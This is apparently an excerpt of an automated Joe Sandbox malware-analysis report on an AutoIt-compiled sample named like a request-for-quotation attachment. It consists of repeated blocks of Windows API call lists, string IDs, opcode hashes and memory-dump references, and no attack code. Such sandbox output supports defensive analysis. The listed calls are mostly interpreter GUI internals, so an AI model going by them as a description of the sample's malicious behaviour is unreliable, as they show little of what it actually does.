                                                                                                                                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                              • API String ID: 1038674560-86951937
                                                                                                                                                                                                                              • Opcode ID: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                                                                                                                                                                                                                              • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                                                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                                                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                                                                                                                                                              • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                                                                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                                                                                                                                                              • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1996641542-0
                                                                                                                                                                                                                              • Opcode ID: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                                                                                                                                                                                                                              • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                                                                                                                                                              • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00488C44
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00488CEC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                                                                                                                              • Opcode ID: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                                                                                                                                                                                                                              • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 004849CA
                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 004849DF
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00484A74
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                                                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                                                                                                                                                              • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                                                                                                                              • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                                                                                              • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                                                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                                                                                                                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                                                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                                                                                                                              • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                                                                                                                                                                                              • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                                                                                                                              • String ID: {nB${nB
                                                                                                                                                                                                                              • API String ID: 884005220-2006378465
                                                                                                                                                                                                                              • Opcode ID: e714fa50f7ad7d14a5681ccfaf236a62528a77072ca14305f3be28b15a70c82e
                                                                                                                                                                                                                              • Instruction ID: 38b29a3dd0b2171ed88fba709932f654a7c922a32c380ed0e5f01bc2022fc850
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e714fa50f7ad7d14a5681ccfaf236a62528a77072ca14305f3be28b15a70c82e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 056129B2640211AFEB106F25DD01B6E77A4EF08335F29552FE880A7291DB7C9911C75E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 0045A51B
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045A52E
                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0045A69C
                                                                                                                                                                                                                              • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045A731
                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045A76B
                                                                                                                                                                                                                                • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                                                                                              • String ID: %s%u
                                                                                                                                                                                                                              • API String ID: 3744389584-679674701
                                                                                                                                                                                                                              • Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                                                                                                                                                                                                              • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045AF29
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                                                                                                                                                              • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0045B065
                                                                                                                                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                                                              • String ID: @$ThumbnailClass
                                                                                                                                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                                                                                                                                              • Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                                                                                                                                                                                                              • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                                                                                                                                                                • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                                                                                                • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                                                                                                • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                                                                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 0048C6EE
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                                                                                                                                                                              • DragFinish.SHELL32(?), ref: 0048C75E
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                                                                                                                                                                              • API String ID: 169749273-3863044002
                                                                                                                                                                                                                              • Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                                                                                                                                                                                                              • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
